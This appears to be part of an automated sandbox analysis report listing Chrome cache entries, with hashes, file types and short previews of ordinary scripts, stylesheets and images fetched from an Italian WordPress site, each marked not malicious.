                                                                        Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....

                                                                        Chrome Cache Entry: 460

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3129)
                                                                        Category:downloaded
                                                                        Size (bytes):13536
                                                                        Entropy (8bit):5.297596259710546
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3B9506442F5E9DA937159EC8E978AC92
                                                                        SHA1:A065A287369571ADF621A0BE14BB31B2BCEF194C
                                                                        SHA-256:B9BDD9C21F6B831230A5EDCD3C073F310BC4C518097ADB15FC50BD25E3343E2B
                                                                        SHA-512:630DED7A1FC798BA19516F2E66DC58D37364EC14501B6C24B5B7DF085DB4B7B86DB1C9EC1740C1D375027E59B7D2F9A00BF960F0E630D034221E1B3388CDDBFF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/gtranslate/js/base.js?ver=6.7.1
                                                                        Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm

                                                                        Chrome Cache Entry: 461

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (347)
                                                                        Category:dropped
                                                                        Size (bytes):23719
                                                                        Entropy (8bit):3.994925954278077
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0A718D8ABA22F4B5D22F4346D970120C
                                                                        SHA1:5DCB8B3D770A2E924EFF24B5E8E867ABAD71665F
                                                                        SHA-256:3D19428D15E940E1DDB3A686D343B93CACF131DBC995309FB0648426812A9A5F
                                                                        SHA-512:F4CB61FD5D5F298D42F96B508121BFA73E440AC5B67FAC190D19E856EB9D91A182B94B2AAB3E974BD74B1F393F45D06D477D0B100AEA3233B3AC69B2B92898A9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(function ($, elementor) {. "use strict";. var Elementskit = {. init: function () {. var widgets = {. 'fmtpl-images-gallery.default': Elementskit.Gallery_init,. 'fmtpl-carousel-reviews.default': Elementskit.Carousel,. 'fmtpl-carousel-images.default': Elementskit.Carousel,. 'fmtpl-carousel-products.default': Elementskit.Carousel,. 'fmtpl-carousel-posts.default': Elementskit.Carousel,. 'fmtpl-carousel-testimonial.default': Elementskit.Carousel,. //'fmtpl-products-tabs.default': Elementskit.Carousel,. 'fmtpl-countdown.default': Elementskit.CountDown,. 'fmtpl-deal.default': Elementskit.CountDown,. 'fmtpl-carousel-product-banner.default': Elementskit.Carousel,. 'fmtpl-carousel-categories-banner.default': Elementskit.Carousel,. 'fmtpl-writer-banner.default': Elementskit.TextRotate,.

                                                                        Chrome Cache Entry: 462

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (11513), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):11513
                                                                        Entropy (8bit):5.205720179763049
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EFC27E253FAE1B7B891FB5A40E687768
                                                                        SHA1:AD12044651FFAC0BADCD0E42F32EDEF91678B1FF
                                                                        SHA-256:46E36DD6CA93014E4915C723632BF180D27CC96CCFB7C26E69213E1A82129A62
                                                                        SHA-512:42FAD6D6BEEAB116CBE8B149DF6B64D65C4998C0A2CC0562BC831AD02ACD82F2B6B9B33836047AAFD6C2D7CF31A6E91FEACA42A2FA6C6077B7F737DEA40D36E6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop

                                                                        Chrome Cache Entry: 463

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1381
                                                                        Entropy (8bit):4.155987463755011
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:539092F09851831781110DE6A65DB57C
                                                                        SHA1:C7DB2DA2B3CE5BBD25903CD7171F5925240A01BF
                                                                        SHA-256:3E381AA7C77118147B136C636228D244CAF39E25E51AE60632A25C52AF218EA6
                                                                        SHA-512:14440CFF2585022B6645F3F0B4771A0AB07524813364DD05579A50B9B27B5690965B168F5F8FC29011C7602F3C36BAA9314A2707D43891396A237DB317D8A3E6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.8
                                                                        Preview:(function ($, elementor) {. "use strict";. var Ciena_Element = {. init: function () {. var widgets = {. 'ciena-category-background.default': Ciena_Element.Category_background. };. $.each(widgets, function (widget, callback) {. elementor.hooks.addAction('frontend/element_ready/' + widget, callback);. });. },. Category_background: function (e) {. var e_cb = e.find('.ciena-category-background');. if (e_cb.length) {. $(document).on("mouseover",'.ciena-category-background .categories-item' ,function () {. var $this = $(this);. if ($this.hasClass('selected')){. return false;. }. var id = $this.data('id');. $('.ciena-category-background .categories-item').removeClass('selected');. $this.addClass('selected');..

                                                                        Chrome Cache Entry: 465

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (422)
                                                                        Category:downloaded
                                                                        Size (bytes):13500
                                                                        Entropy (8bit):4.85125588026711
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E260840BB555C3BC7C03242BDD4D2375
                                                                        SHA1:98D84D42673CEC9BFD7A31F9C4CDA6FDAD183892
                                                                        SHA-256:676AD760EE97B5521AFAB69DE01DBBA8181DE641E23C4738CF1C0B2CC2BDEAB6
                                                                        SHA-512:1DB53E1ED833108484B1B73402E146F0312CA36973A033E6C5451B1595F3C73FD6F0A5355225AB8DDDD746F6F56B23B368D9EFB07983EDA25AB2919946E7995D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8
                                                                        Preview:/*--------------------------------------------------------------.# Defined Variable.--------------------------------------------------------------*/./*--------------------------------------------------------------.# Global Style - FM Theme.--------------------------------------------------------------*/.svg.fm-icon:hover {. fill: #97d1dc;. stroke: #97d1dc;.}...woocommerce #respond input#submit.btn-advance, .familab_theme #respond input#submit.btn-advance, .woocommerce a.button.btn-advance, .familab_theme a.button.btn-advance, .woocommerce button.button.btn-advance, .familab_theme button.button.btn-advance, .woocommerce button.button.alt.btn-advance, .familab_theme button.button.alt.btn-advance, .woocommerce input.button.btn-advance, .familab_theme input.button.btn-advance {. background: #97d1dc;.}...fmc-announcement-box .fm-countdown-time .box-count {. background: #97d1dc;.}..familab_theme .fmc-announcement-box .announcement_btn a {. background: #97d1dc;.}...top-bar.dark *:hover,

                                                                        Chrome Cache Entry: 466

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10150)
                                                                        Category:downloaded
                                                                        Size (bytes):10332
                                                                        Entropy (8bit):5.175424441862342
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6BDD4DCA7CB09218E1860E6E0CA8A823
                                                                        SHA1:DFF6AC08D3CCF6F1D4F31C2D77FFA19E5ED112EE
                                                                        SHA-256:B7F28F2464E085279A304D2ABEE8F0C89F82077338DFE0DD44882ED0D53D018C
                                                                        SHA-512:69C128B655B22B150090D585FAE2D1E2375400EDAC8A8F61A9FD12CBEE07D464AF43820BBF32E21AD55FF12087F9172F51F70943E301A2301C2E5E3A90993990
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3
                                                                        Preview:/*!. * jQuery UI Effects 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","./jquery-var-for-color","./vendor/jquery-color/jquery.color","./version"],t):t(jQuery)}(function(u){"use strict";var s,o,r,a,c,e,n,i,f,l,d="ui-effects-",h="ui-effects-style",p="ui-effects-animated";function m(t){var e,n,i=t.ownerDocument.defaultView?t.ownerDocument.defaultView.getComputedStyle(t,null):t.currentStyle,o={};if(i&&i.length&&i[0]&&i[i[0]])for(n=i.length;n--;)"string"==typeof i[e=i[n]]&&(o[e.replace(/-([\da-z])/gi,function(t,e){return e.toUpperCase()})]=i[e]);else for(e in i)"string"==typeof i[e]&&(o[e]=i[e]);return o}function g(t,e,n,i){return t={effect:t=u.isPlainObject(t)?(e=t).effect:t},"function"==typeof(e=null==e?{}:e)&&(i=e,n=null,e={}),"number"!=typeof e&&!u.fx.speeds[e]||(i=n,n=e,e={}),"function"==typeof n&

                                                                        Chrome Cache Entry: 467

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3826
                                                                        Entropy (8bit):4.329716798048804
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D27023098DBE1701B23B3BDDDA5D7B97
                                                                        SHA1:AD3B5CE9F16CF2DB43FBDA0F31449BCB7F1B467C
                                                                        SHA-256:4BFE601DAF3AEADD7095B0F5709B4DB2538F88653D7140F21D376D4263801D92
                                                                        SHA-512:9218E83F79B20EF6BD8D299E4C841FABF39E077287E40BFCCF52CD7A0C391E39EB543F5E34F770A89999E0D53E635FB535E0A2912F303C91E5B5731FA3C06914
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8
                                                                        Preview:;(function ($) {. "use strict"; // Start of use strict. /* ---------------------------------------------. Resize mega menu. --------------------------------------------- */. function responsive_megamenu_item(container, element) {. if ( container != 'undefined' ) {. var container_width = 0,. container_offset = container.offset();.. if ( typeof container_offset != 'undefined' ) {. container_width = container.innerWidth();. setTimeout(function () {. $(element).children('.mega-menu-container').css({'max-width': container_width + 'px'});. var sub_menu_width = $(element).children('.mega-menu-container').outerWidth(),. item_width = $(element).outerWidth();. $(element).children('.mega-menu-container').css({'left': '-' + (sub_menu_width / 2 - item_width / 2) + 'px'});. var container_left = container_of

                                                                        Chrome Cache Entry: 469

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (11679)
                                                                        Category:dropped
                                                                        Size (bytes):12966
                                                                        Entropy (8bit):5.389917183513275
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:985E549BABE51C51D871B00208C9DEAA
                                                                        SHA1:B61B6F119E8AFA9093B57CFBC3A6AE0CCD103A95
                                                                        SHA-256:41258FF49BB9E69EDA5A9410869B11D99F7DD20B353F0628A701FE66C75C67A1
                                                                        SHA-512:A50C0BC353CF779606C445025F689185CAA435CBF1B908B69189E3132C4110426ED768B7665893D916CA79FA1DEC8D1B84722F5D155511432606D33840B51E4F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":3301862,"rec_value":0.37999999999999995,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_console_consent":false,"anonymize_digits":true,"anonymize_emails":true,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":false,"legal_name":null,"privacy_policy_url":null,"deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"kissmetrics":{"send_user_id":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"hubspot":{"enabled":false,"send_recordings":false,"send_surveys":false}},"features":["ask.popover_redesign","client_script.compression.pc","csq_theme","error_reporting","feedback.embeddable_widget","feedback.w

                                                                        Chrome Cache Entry: 470

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10544)
                                                                        Category:dropped
                                                                        Size (bytes):10682
                                                                        Entropy (8bit):5.103165363656437
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4EEE50AC6F4F364BA3A284D0753DDAE3
                                                                        SHA1:A8E7E824E6824AE0B370FF36E2C07CA07276FAE0
                                                                        SHA-256:B936DB5880AA9B6B2F26A8D32FC2B689FB75F69D971B94194F16DBA801221FFE
                                                                        SHA-512:AD7154338F51A1FD2745D1321412F1D418B76CD99F8B439E5ECBD8CDAA7AC09355EE30D4F26044988ACD739BA8B059CA91316798CB0E9B6432D86F006AD49B02
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! dialogs-manager v4.9.0 | (c) Kobi Zaltzberg | https://github.com/kobizz/dialogs-manager/blob/master/LICENSE.txt. 2021-08-15 18:13 */.!function(p,t){"use strict";var y={widgetsTypes:{},createWidgetType:function(t,e,n){n=n||this.Widget;function i(){n.apply(this,arguments)}var o=i.prototype=new n(t);return o.types=o.types.concat([t]),p.extend(o,e),(o.constructor=i).extend=function(t,e){return y.createWidgetType(t,e,i)},i},addWidgetType:function(t,e,n){return e&&e.prototype instanceof this.Widget?this.widgetsTypes[t]=e:this.widgetsTypes[t]=this.createWidgetType(t,e,n)},getWidgetType:function(t){return this.widgetsTypes[t]}};y.Instance=function(){var n=this,e={},i={};this.createWidget=function(t,e){t=new(y.getWidgetType(t))(t);return t.init(n,e=e||{}),t},this.getSettings=function(t){return t?i[t]:Object.create(i)},this.init=function(t){return p.extend(i,{classPrefix:"dialog",effects:{show:"fadeIn",hide:"fadeOut"}},t),e.body=p("body"),n},n.init()},y.Widget=function(n){function e(t,e){var

                                                                        Chrome Cache Entry: 475

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 513x330, components 3
                                                                        Category:dropped
                                                                        Size (bytes):42000
                                                                        Entropy (8bit):7.981674651059325
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:85E20AC73DFE7B8248DA60D0A28A788D
                                                                        SHA1:41E18A3DFD153AF842E2D7BEF71577CD91C2A70D
                                                                        SHA-256:251EDA10E6C17E0CE42B1AB05794B4A05045B184BC9B4FB843D71989A88A232B
                                                                        SHA-512:1EF6187E9DA483B0993DC517009F1ADF1EB13F023C06453F774356037F58B8EB523587C7906C7BCEDF5EA48752A552AA31899FF70BF943EB47EB573C5B361832
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......J...."..............................................................................M.a..0/..%.aY......+.:.Y...!+:.)G.(.F............e.e.+0Dc....p.N....>V...".D.}PxS....[.[.N.X.p..>s.,.I;..cZ....._G..z.Z.F_...e4.M....1J.f...j_..e...1hhu...D.<.......T....[..q...n.:.)....`........6.XL..W.>.<...u.Fq...*.._.W...c.".)S{.f.......}.vPK....7u7=..K...T.Q..h.\T.6....J..E......EL..(Mpk....`.....JZ....c..%6<j...j8......w.z.'.Cl...f.......:.,.9....C..T...).H.|...rye..hr-.Q.,?.........0..6..:....W5..k..lk<.{,....A......{...,..g....E..\._i..O.N.P.]S..S..F.(@.KC..I.G..@?U.ii. .b...).0._p.it..$.p.5L1..=gK..s..d...7t...[...j{.x....'.....B.W....5. ...I.2.|...>].P.)..F.......O,...G.<Y.b...$.;3j...N...g..i.t{..#...............N_.....z...u.k.[...o;....&..s..z..|.S.OF........b.Sh....pEO.{r...W0.).....~.U?

                                                                        Chrome Cache Entry: 477

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):27496
                                                                        Entropy (8bit):5.410888941378586
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4E5DB8F0A2828EA3FA8130DB2C6408CE
                                                                        SHA1:50ACCF340009875F95BD39A0E1F949ED30104898
                                                                        SHA-256:4B318C9EDC2D8C3A830EA62766D0EC108D7D2C0DCE992E2F10B9036960E47E1D
                                                                        SHA-512:2F9CB12428A6890A8A10D9425E7F14F30C74B48FCE642197D992022D617CADB39B17BCD3DE194B0B8E15884C0A29B0ADC62CC0B11185CE7B9E41F975A43D60C8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.googleapis.com/css?family=Mulish%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1
                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joiaqRXBA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joraqRXBA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Mulish';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2jogaqRXBA.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Mulish';. font-style:

                                                                        Chrome Cache Entry: 479

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10578)
                                                                        Category:dropped
                                                                        Size (bytes):10759
                                                                        Entropy (8bit):5.108770861795029
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EC2777F6B09C345D2AB0DEF96B5CAB9D
                                                                        SHA1:10713118D9F7AA90BDCE30EA21508B2E99B8B33F
                                                                        SHA-256:D9B268266AF74B5C0834E2A519303CA97C5427C5FB7ABB3B89AD29E07664BE14
                                                                        SHA-512:77B8845DAA7449A72A6365E75AE56781C82B503619F7D90CE4BA0F5A8C025B59F3881F0BD3B51570B2C3A6567A6BE1E783615954D84B9FFF95812E230CC8FFCB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * jQuery UI Slider 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","./mouse","../keycode","../version","../widget"],e):e(jQuery)}(function(o){"use strict";return o.widget("ui.slider",o.ui.mouse,{version:"1.13.3",widgetEventPrefix:"slide",options:{animate:!1,classes:{"ui-slider":"ui-corner-all","ui-slider-handle":"ui-corner-all","ui-slider-range":"ui-corner-all ui-widget-header"},distance:0,max:100,min:0,orientation:"horizontal",range:!1,step:1,value:0,values:null,change:null,slide:null,start:null,stop:null},numPages:5,_create:function(){this._keySliding=!1,this._mouseSliding=!1,this._animateOff=!0,this._handleIndex=null,this._detectOrientation(),this._mouseInit(),this._calculateNewMax(),this._addClass("ui-slider ui-slider-"+this.orientation,"ui-widget ui-widget-content"),this._refresh(),this._a

                                                                        Chrome Cache Entry: 480

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 3527 x 1006, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):41138
                                                                        Entropy (8bit):7.757697474545904
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3E4B64FB4725FDFAFA12C8ED7ED195E3
                                                                        SHA1:BDB761604E2F572EBED5DAA79C5C7614935A4883
                                                                        SHA-256:DBE4D284B9804D59E34887831F9698B5F48EAA787CC5407B9E59AB0F2D4B6D0D
                                                                        SHA-512:2C47249260A8A20A88E3D34C1E8039309C5EC64B33B02D22A2FE7F1B1E11C564E86CD61C9A3CCD451F397B35C3A5CD7B535B20B06DE0F010D9430F57BF7AA4B8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.............@.......pHYs..,J..,J.wztM...3PLTEGpL.................................................A.*....tRNS. .0..`.@...p.P..(.. .IDATx....(........\...=.C..*..7G8l!t..*...0M.8._t.._.<.q....^K=M..1<4.....P8..A.......G.................k./...mn..C.5.5......a..y..9.u..6........+.n.=.&a..d................~5d.....p.......@...0.4.E.9...:.O...w.'....Y..........u.....qEaM.r.G....o........z..0MS.O........Gn.&..c...-.c....o.0.6.X....@mz..5N.3k.\,....l...z../....0y....LWf..G.8.c1v..<r.K.~.\....-.W..}.d.H..l.R.../Eg..cI\. ....zl......U.....q?k.$+.x\..O|....DP..Ug).P..1O....<...MK. 'o..(x..Rz.kJ........[lK.......Q...'.R=.:d......8......q.....|..M......e.&.Z,n..q..qAq.....m.z..*+.....o.9Y..x\...S-U...Y"...mrS...S.j.s?.'{..rF<m...i.......q..@}..Y.k...+<...}....3...4.P....&....w]M.H...^2.o..{..*+.W..I....<......tDRi.2.-[o..}Zcg...^.q?~.Q*..8.......q..J....J..0.qg.'.Ig...-..N..u<...}x...19<.kt.L.w..43...q..y...m.a....8_.|.......r..Go....b....5

                                                                        Chrome Cache Entry: 481

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):78597
                                                                        Entropy (8bit):7.356715458451207
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1A4FD5C8E63CA02ECEA3BDC328CD8A29
                                                                        SHA1:467FD2E36B0D900F672C17DA3C9753E35E3BE15F
                                                                        SHA-256:3F1E81E4AB0288BEA1A59B1A63E0650418E04426DD3EF30B826AD1D668649290
                                                                        SHA-512:36C361018C6A5E2A46705A8E3015E4FE48E245689D9F21F654B692F78100531557157E988FDB84E29F1A29D3A2F61FB1B6D02B9BFF3918ECE4FBEAF8B4746027
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME........q.... .IDATx....ud7.'..q.......mA.Z0Z.V.t....`..L...z..`H.H....>G.?U$2I..~.9zR.....|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`R.............q..s......13_T.....X.@......Kj.]G...%".T.C.F...O...G..Zk%"~r..:O?E.O^.g..c.........z......*.....3.H.....`9......T

                                                                        Chrome Cache Entry: 483

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1026 x 660, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):336687
                                                                        Entropy (8bit):7.9371821202017
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9F132C14B2459786AE408925E2D69971
                                                                        SHA1:91C9D644293E9E0FC4FA58AD1C6B14F942A468D0
                                                                        SHA-256:FD2690B49719B6AD474EEF9B3AD4138CE6EAB5DB3DAD584696A3893217D1FFCA
                                                                        SHA-512:B53A1AF676819FFD6713001BFC620E32CB235275C7CD5D1C1711EEE1D638555C92427BBFCB6EE178B72192B9AB9BEDAA344863C9CA1041EC93D10C6570AD71A3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png
                                                                        Preview:.PNG........IHDR...............j.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Progetto senza titolo - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-04</Attrib:Created>. <Attrib:ExtId>084c4f8e-910b-4d8c-a0ab-d8b9c35096cf</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.ad

                                                                        Chrome Cache Entry: 485

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (326)
                                                                        Category:dropped
                                                                        Size (bytes):47503
                                                                        Entropy (8bit):4.578612796150673
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:85E54FA10ECCE4F46CF83953EB1431A2
                                                                        SHA1:56EC60080765E2B1C71BF7B86BD349825D0BA78E
                                                                        SHA-256:FA8A837C69930D75A3C3A05C803A8271BD57AE5DD61FBE81D4341F38D1F58165
                                                                        SHA-512:F97657186A18B4092889AA1CB49D2767DF2B0BA15C0F24130A23B061A350B22D780C06589643E2E8DEC4CCF726FB51EA993C62FA59E211C9E589C295F78F0BF9
                                                                        Malicious:false
                                                                        Reputation:unknown
